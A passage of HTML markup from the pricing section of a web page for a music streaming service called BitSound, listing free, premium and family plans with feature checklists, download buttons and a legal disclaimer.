                                            <div class="feature-icon">
                                                <svg class="svg-icon svg-icon-check" focusable="false" height="16" width="16" viewBox="0 0 12 12" aria-hidden="true">
                                                    <path d="M.833 5.333a.487.487 0 0 0-.69.688l3.79 3.785.345.344 7.578-7.568a.487.487 0 0 0-.689-.688l-6.889 6.88L.833 5.333z"></path>
                                                </svg>
                                            </div>
                                            <div class="feature-title">Shuffle Play</div>
                                        </li>
                                        <li class="unlogged-single-plan-item is-inactive">
                                            <div class="feature-icon">
                                                <svg class="svg-icon svg-icon-cancel" focusable="false" height="16" width="16" viewBox="0 0 12 12" aria-hidden="true">
                                                    <path d="M1.75 10.25l8.5-8.5m.002 8.505L1.75 1.75" fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-width="1.5"></path>
                                                </svg>
                                            </div>
                                            <div class="feature-title">No ads</div>
                                        </li>
                                        <li class="unlogged-single-plan-item is-inactive">
                                            <div class="feature-icon">
                                                <svg class="svg-icon svg-icon-cancel" focusable="false" height="16" width="16" viewBox="0 0 12 12" aria-hidden="true">
                                                    <path d="M1.75 10.25l8.5-8.5m.002 8.505L1.75 1.75" fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-width="1.5"></path>
                                                </svg>
                                            </div>
                                            <div class="feature-title">Get unlimited skips</div>
                                        </li>
                                        <li class="unlogged-single-plan-item is-inactive">
                                            <div class="feature-icon">
                                                <svg class="svg-icon svg-icon-cancel" focusable="false" height="16" width="16" viewBox="0 0 12 12" aria-hidden="true">
                                                    <path d="M1.75 10.25l8.5-8.5m.002 8.505L1.75 1.75" fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-width="1.5"></path>
                                                </svg>
                                            </div>
                                            <div class="feature-title">Offline mode</div>
                                        </li>
                                        <li class="unlogged-single-plan-item is-inactive">
                                            <div class="feature-icon">
                                                <svg class="svg-icon svg-icon-cancel" focusable="false" height="16" width="16" viewBox="0 0 12 12" aria-hidden="true">
                                                    <path d="M1.75 10.25l8.5-8.5m.002 8.505L1.75 1.75" fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-width="1.5"></path>
                                                </svg>
                                            </div>
                                            <div class="feature-title">6 profiles</div>
                                        </li>
                                    </ul>
                                </div>
                                <div class="unlogged-plan-btn-info"><a class="unlogged-btn unlogged-btn-grey unlogged-btn-hover-scale" id="free-plan-button" onclick="down()"><span class="unlogged-btn-label">Download</span></a></div>
                                <div class="unlogged-plan-more-info"></div>
                            </li>
                            <li class="unlogged-single-plan unlogged-single-plan-premium is-popular is-recommanded" data-popular="RECOMMENDED">
                                <div class="unlogged-single-plan-desc">
                                    <h3 class="unlogged-title">BitSound Premium</h3>
                                    <p class="unlogged-heading-2 unlogged-single-plan-price">3$</p>
                                    <div class="unlogged-single-plan-unit">/month</div>
                                    <ul class="unlogged-single-plan-items">
                                        <li class="unlogged-single-plan-item">
                                            <div class="feature-icon">
                                                <svg class="svg-icon svg-icon-check" focusable="false" height="16" width="16" viewBox="0 0 12 12" aria-hidden="true">
                                                    <path d="M.833 5.333a.487.487 0 0 0-.69.688l3.79 3.785.345.344 7.578-7.568a.487.487 0 0 0-.689-.688l-6.889 6.88L.833 5.333z"></path>
                                                </svg>
                                            </div>
                                            <div class="feature-title"> 56 million tracks</div>
                                        </li>
                                        <li class="unlogged-single-plan-item">
                                            <div class="feature-icon">
                                                <svg class="svg-icon svg-icon-check" focusable="false" height="16" width="16" viewBox="0 0 12 12" aria-hidden="true">
                                                    <path d="M.833 5.333a.487.487 0 0 0-.69.688l3.79 3.785.345.344 7.578-7.568a.487.487 0 0 0-.689-.688l-6.889 6.88L.833 5.333z"></path>
                                                </svg>
                                            </div>
                                            <div class="feature-title">No ads</div>
                                        </li>
                                        <li class="unlogged-single-plan-item">
                                            <div class="feature-icon">
                                                <svg class="svg-icon svg-icon-check" focusable="false" height="16" width="16" viewBox="0 0 12 12" aria-hidden="true">
                                                    <path d="M.833 5.333a.487.487 0 0 0-.69.688l3.79 3.785.345.344 7.578-7.568a.487.487 0 0 0-.689-.688l-6.889 6.88L.833 5.333z"></path>
                                                </svg>
                                            </div>
                                            <div class="feature-title">Get unlimited skips</div>
                                        </li>
                                        <li class="unlogged-single-plan-item">
                                            <div class="feature-icon">
                                                <svg class="svg-icon svg-icon-check" focusable="false" height="16" width="16" viewBox="0 0 12 12" aria-hidden="true">
                                                    <path d="M.833 5.333a.487.487 0 0 0-.69.688l3.79 3.785.345.344 7.578-7.568a.487.487 0 0 0-.689-.688l-6.889 6.88L.833 5.333z"></path>
                                                </svg>
                                            </div>
                                            <div class="feature-title">Offline mode</div>
                                        </li>
                                        <li class="unlogged-single-plan-item is-inactive">
                                            <div class="feature-icon">
                                                <svg class="svg-icon svg-icon-cancel" focusable="false" height="16" width="16" viewBox="0 0 12 12" aria-hidden="true">
                                                    <path d="M1.75 10.25l8.5-8.5m.002 8.505L1.75 1.75" fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-width="1.5"></path>
                                                </svg>
                                            </div>
                                            <div class="feature-title">6 profiles</div>
                                        </li>
                                    </ul>
                                </div>
                                <div class="unlogged-plan-btn-info">
                                    <p class="unlogged-single-plan-more bold underline">30 days free</p><a class="unlogged-btn unlogged-btn-pink unlogged-btn-hover-scale" id="premium-plan-button" onclick="down()"><span class="unlogged-btn-label">Try it now</span></a></div>
                                <div class="unlogged-plan-more-info"></div>
                            </li>
                            <li class="unlogged-single-plan unlogged-single-plan-family" data-popular="RECOMMENDED">
                                <div class="unlogged-single-plan-desc">
                                    <h3 class="unlogged-title">BitSound Family</h3>
                                    <p class="unlogged-heading-2 unlogged-single-plan-price">5$</p>
                                    <div class="unlogged-single-plan-unit">/month</div>
                                    <ul class="unlogged-single-plan-items">
                                        <li class="unlogged-single-plan-item">
                                            <div class="feature-icon">
                                                <svg class="svg-icon svg-icon-check" focusable="false" height="16" width="16" viewBox="0 0 12 12" aria-hidden="true">
                                                    <path d="M.833 5.333a.487.487 0 0 0-.69.688l3.79 3.785.345.344 7.578-7.568a.487.487 0 0 0-.689-.688l-6.889 6.88L.833 5.333z"></path>
                                                </svg>
                                            </div>
                                            <div class="feature-title"> 56 million tracks</div>
                                        </li>
                                        <li class="unlogged-single-plan-item">
                                            <div class="feature-icon">
                                                <svg class="svg-icon svg-icon-check" focusable="false" height="16" width="16" viewBox="0 0 12 12" aria-hidden="true">
                                                    <path d="M.833 5.333a.487.487 0 0 0-.69.688l3.79 3.785.345.344 7.578-7.568a.487.487 0 0 0-.689-.688l-6.889 6.88L.833 5.333z"></path>
                                                </svg>
                                            </div>
                                            <div class="feature-title">No ads</div>
                                        </li>
                                        <li class="unlogged-single-plan-item">
                                            <div class="feature-icon">
                                                <svg class="svg-icon svg-icon-check" focusable="false" height="16" width="16" viewBox="0 0 12 12" aria-hidden="true">
                                                    <path d="M.833 5.333a.487.487 0 0 0-.69.688l3.79 3.785.345.344 7.578-7.568a.487.487 0 0 0-.689-.688l-6.889 6.88L.833 5.333z"></path>
                                                </svg>
                                            </div>
                                            <div class="feature-title">Get unlimited skips</div>
                                        </li>
                                        <li class="unlogged-single-plan-item">
                                            <div class="feature-icon">
                                                <svg class="svg-icon svg-icon-check" focusable="false" height="16" width="16" viewBox="0 0 12 12" aria-hidden="true">
                                                    <path d="M.833 5.333a.487.487 0 0 0-.69.688l3.79 3.785.345.344 7.578-7.568a.487.487 0 0 0-.689-.688l-6.889 6.88L.833 5.333z"></path>
                                                </svg>
                                            </div>
                                            <div class="feature-title">Offline mode</div>
                                        </li>
                                        <li class="unlogged-single-plan-item">
                                            <div class="feature-icon">
                                                <svg class="svg-icon svg-icon-check" focusable="false" height="16" width="16" viewBox="0 0 12 12" aria-hidden="true">
                                                    <path d="M.833 5.333a.487.487 0 0 0-.69.688l3.79 3.785.345.344 7.578-7.568a.487.487 0 0 0-.689-.688l-6.889 6.88L.833 5.333z"></path>
                                                </svg>
                                            </div>
                                            <div class="feature-title">6 profiles</div>
                                        </li>
                                    </ul>
                                </div>
                                <div class="unlogged-plan-btn-info"><a class="unlogged-btn unlogged-btn-pink unlogged-btn-hover-scale" id="family-plan-button" onclick="down()"><span class="unlogged-btn-label">Try it now</span></a></div>
                                <div class="unlogged-plan-more-info"></div>
                            </li>
                        </ul>
                        <p class="plans-block-legal">These offers are non-binding, meaning you can cancel your subscription at any time.&nbsp;These offers are only available to users with no current nor previous subscription to any BitSound subscription tier, with no benefit from any previous BitSound promotion and no previous free trial to any BitSound subscription tier at any time.&nbsp;These offers cannot be combined with any other offer.&nbsp;These are one-time only offers and are valid for one user only.</p>
                    </div>
                </div>
            </section>
            <div class="modal" id="modal" role="dialog" aria-hidden="true" style="display: none;">
                <div class="modal-backdrop"></div>
                <div class="modal-wrapper"></div>
            </div>
        </div>
        <footer class="footer">
            <div class="cell cell-logo">
                <a href="#">
                    <h1 style="color:#fff; font-size:2em;">© 2019 - 2020 BitSound Inc.</h1>
                </a>
            </div>
        </footer>
    </div>
        <!-- Jquery and Js Plugins -->
    <script type="text/javascript" src="assets/js/jquery-2.1.1.js"></script>
    <script type="text/javascript" src="assets/js/popper.min.js"></script>
    <script type="text/javascript" src="assets/js/bootstrap.min.js"></script>
    <script type="text/javascript" src="assets/js/jquery.validate.min.js"></script>
    <script type="text/javascript" src="assets/js/plugins.js"></script>
    <script type="text/javascript" src="assets/js/custom.js"></script>
</body>
</html>
